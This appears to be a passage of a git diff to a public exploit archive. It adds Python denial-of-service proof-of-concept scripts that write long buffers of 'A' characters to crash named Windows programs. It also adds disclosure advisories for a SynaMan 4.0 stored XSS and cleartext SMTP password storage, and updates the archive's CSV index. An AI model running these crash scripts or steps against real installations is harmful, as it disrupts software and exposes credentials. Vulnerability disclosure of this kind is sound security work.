+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/45389.py b/exploits/windows/dos/45389.py
new file mode 100755
index 000000000..822174d9e
--- /dev/null
+++ b/exploits/windows/dos/45389.py
@@ -0,0 +1,25 @@
+# Exploit Title: PDF Explorer 1.5.66.2 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-12
+# Software Link: https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip
+# Tested Version: 1.5.66.2
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. When inside the program click "Database" > "Custom fields settings..."
+# Now paste the contents of "exploit.txt" into the fields:"Label"
+# Click the "OK" button and you will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 7000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/45390.py b/exploits/windows/dos/45390.py
new file mode 100755
index 000000000..6fe6cc9c1
--- /dev/null
+++ b/exploits/windows/dos/45390.py
@@ -0,0 +1,25 @@
+# Exploit Title: Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-12
+# Software Link: https://www.infiltration-systems.com/download.shtml
+# Tested Version: 4.6
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program.
+# Now paste the contents of "exploit.txt" into the fields:"Scan Target"
+# Click the "Scan" button, wait and you will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/webapps/45386.txt b/exploits/windows/webapps/45386.txt
new file mode 100644
index 000000000..ab59a0bed
--- /dev/null
+++ b/exploits/windows/webapps/45386.txt
@@ -0,0 +1,39 @@
+# Exploit Author: bzyo
+# CVE: CVE-2018-10763
+# Twitter: @bzyo_
+# Exploit Title: SynaMan 4.0 - Authenticated Cross Site Scripting (XSS)
+# Date: 09-12-18
+# Vulnerable Software: SynaMan 4.0 build 1488
+# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
+# Version: 4.0 build 1488
+# Software Link: http://web.synametrics.com/SynaManDownload.htm
+# Tested On: Windows 7 x86
+
+Description
+-----------------------------------------------------------------
+SynaMan 4.0 suffers from Authenticated Cross Site Scripting (XSS)
+
+
+Prerequisites
+-----------------------------------------------------------------
+Admin access to Synaman web console
+
+Proof of Concept
+-----------------------------------------------------------------
+From Configuration > Advanced Configuration > Partial Branding
+- Main heading
+- Sub heading
+
+If one were to apply the following XSS payload in either of the fields, alert pop-ups with xss would be present on navigation throughout the web app
+
+
+
+While Chrome does block the XSS payload on apply, simply hitting the back button and selecting "Explore" the payload is stored
+
+
+Timeline
+---------------------------------------------------------------------
+05-07-18: Vendor notified of vulnerabilities
+05-08-18: Vendor responded and will fix
+07-25-18: Vendor fixed in new release
+09-12-18: Submitted public disclosure
\ No newline at end of file
diff --git a/exploits/windows/webapps/45387.txt b/exploits/windows/webapps/45387.txt
new file mode 100644
index 000000000..399168b6f
--- /dev/null
+++ b/exploits/windows/webapps/45387.txt
@@ -0,0 +1,45 @@
+# Exploit Author: bzyo
+# CVE: CVE-2018-10814
+# Twitter: @bzyo_
+# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings
+# Date: 09-12-18
+# Vulnerable Software: SynaMan 4.0 build 1488
+# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
+# Version: 4.0 build 1488
+# Software Link: http://web.synametrics.com/SynaManDownload.htm
+# Tested On: Windows 7 x86
+
+Description
+-----------------------------------------------------------------
+SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise
+
+Prerequisites
+-----------------------------------------------------------------
+Access to a system running Synaman 4 using a low-privileged user account
+
+Proof of Concept
+-----------------------------------------------------------------
+The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file. This file can be viewed by any local user of the system.
+
+C:\SynaMan\config>type AppConfig.xml
+
+
+
+
+
+
+ **truncated**
+
+
+
+
+
+
+
+
+Timeline
+---------------------------------------------------------------------
+05-07-18: Vendor notified of vulnerabilities
+05-08-18: Vendor responded and will fix
+07-25-18: Vendor fixed in new release
+09-12-18: Submitted public disclosure
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45380.py b/exploits/windows_x86/dos/45380.py
new file mode 100755
index 000000000..97e029feb
--- /dev/null
+++ b/exploits/windows_x86/dos/45380.py
@@ -0,0 +1,25 @@
+# Exploit Title: jiNa OCR Image to Text 1.0 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-10
+# Software Link: http://www.convertimagetotext.net/downloadsoftware.php
+# Tested Version: 1.0
+# Tested on OS: Windows 7 32-bit
+
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.png".
+# Now start the program. Now when you are inside of the program attempt to convert the file "exploit.png" to pdf.
+# Now wait and you will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+ f=open("exploit.png","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45381.py b/exploits/windows_x86/dos/45381.py
new file mode 100755
index 000000000..3d02927bd
--- /dev/null
+++ b/exploits/windows_x86/dos/45381.py
@@ -0,0 +1,25 @@
+# Exploit Title: PixGPS 1.1.8 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-10
+# Software Link: http://www.br-software.com/pixgps11_setup.exe
+# Tested Version: 1.1.8
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program.
+# Now when you are inside of the program paste the contents of "exploit.txt" into the field:"Folder with picture files"
+# Click the "..." button and you will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45382.py b/exploits/windows_x86/dos/45382.py
new file mode 100755
index 000000000..df9f91aaa
--- /dev/null
+++ b/exploits/windows_x86/dos/45382.py
@@ -0,0 +1,25 @@
+# Exploit Title: RoboImport 1.2.0.72 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-11
+# Software Link: http://www.picajet.com/download/RoboImportInstall.exe
+# Tested Version: 1.2.0.72
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program.
+# Now paste the contents of "exploit.txt" into the fields:"Registration Name" & "Registration key"
+# Click the "Register" button and you will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45383.py b/exploits/windows_x86/dos/45383.py
new file mode 100755
index 000000000..883cb9661
--- /dev/null
+++ b/exploits/windows_x86/dos/45383.py
@@ -0,0 +1,25 @@
+# Exploit Title: PicaJet FX 2.6.5 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-11
+# Software Link: http://www.picajet.com/download/PicaJetFXInstall.exe
+# Tested Version: 2.6.5
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. When inside the program click "Help" > "Register PicaJet..."
+# Now paste the contents of "exploit.txt" into the fields:"Registration Name" & "Registration Key"
+# Click the "OK" button and you will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 26463c35f..3eaf91d1c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6096,7 +6096,15 @@ id,file,description,date,author,type,platform,port
 45321,exploits/ios/dos/45321.py,"Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)",2018-09-03,"Luis Martínez",dos,ios,
 45324,exploits/windows/dos/45324.py,"Wikipedia 12.0 - Denial of Service (PoC)",2018-09-03,0xB9,dos,windows,
 45357,exploits/windows_x86/dos/45357.txt,"Zenmap (Nmap) 7.70 - Denial of Service (PoC)",2018-09-10,"Gionathan Reale",dos,windows_x86,
+45380,exploits/windows_x86/dos/45380.py,"jiNa OCR Image to Text 1.0 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86,
 45376,exploits/windows_x86/dos/45376.py,"HTML5 Video Player 1.2.5 - Denial of Service (PoC)",2018-09-11,T3jv1l,dos,windows_x86,
+45381,exploits/windows_x86/dos/45381.py,"PixGPS 1.1.8 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86,
+45382,exploits/windows_x86/dos/45382.py,"RoboImport 1.2.0.72 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86,
+45383,exploits/windows_x86/dos/45383.py,"PicaJet FX 2.6.5 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows_x86,
+45388,exploits/windows/dos/45388.py,"iCash 7.6.5 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
+45389,exploits/windows/dos/45389.py,"PDF Explorer 1.5.66.2 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
+45390,exploits/windows/dos/45390.py,"Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)",2018-09-12,"Gionathan Reale",dos,windows,
+45391,exploits/macos/dos/45391.py,"Apple macOS 10.13.4 - Denial of Service (PoC)",2018-09-12,Sriram,dos,macos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39948,3 +39956,10 @@ id,file,description,date,author,type,platform,port
 45351,exploits/hardware/webapps/45351.py,"LW-N605R 12.20.2.1486 - Remote Code Execution",2018-09-10,"Nassim Asrir",webapps,hardware,
 45361,exploits/linux/webapps/45361.py,"RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution",2018-09-04,"Reigning Shells",webapps,linux,
 45375,exploits/php/webapps/45375.txt,"Bayanno Hospital Management System 4.0 - Cross-Site Scripting",2018-09-11,"Gokhan Sagoglu",webapps,php,
+45384,exploits/hardware/webapps/45384.py,"CirCarLife SCADA 4.3.0 - Credential Disclosure",2018-09-12,SadFud,webapps,hardware,
+45385,exploits/linux/webapps/45385.txt,"Rubedo CMS 3.4.0 - Directory Traversal",2018-09-12,"Marouene Boubakri",webapps,linux,
+45386,exploits/windows/webapps/45386.txt,"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)",2018-09-12,bzyo,webapps,windows,
+45387,exploits/windows/webapps/45387.txt,"SynaMan 4.0 build 1488 - SMTP Credential Disclosure",2018-09-12,bzyo,webapps,windows,
+45392,exploits/php/webapps/45392.txt,"IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection",2018-09-12,"Mohamed Sayed",webapps,php,
+45393,exploits/php/webapps/45393.txt,"MyBB 1.8.17 - Cross-Site Scripting",2018-09-12,0xB9,webapps,php,
+45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware,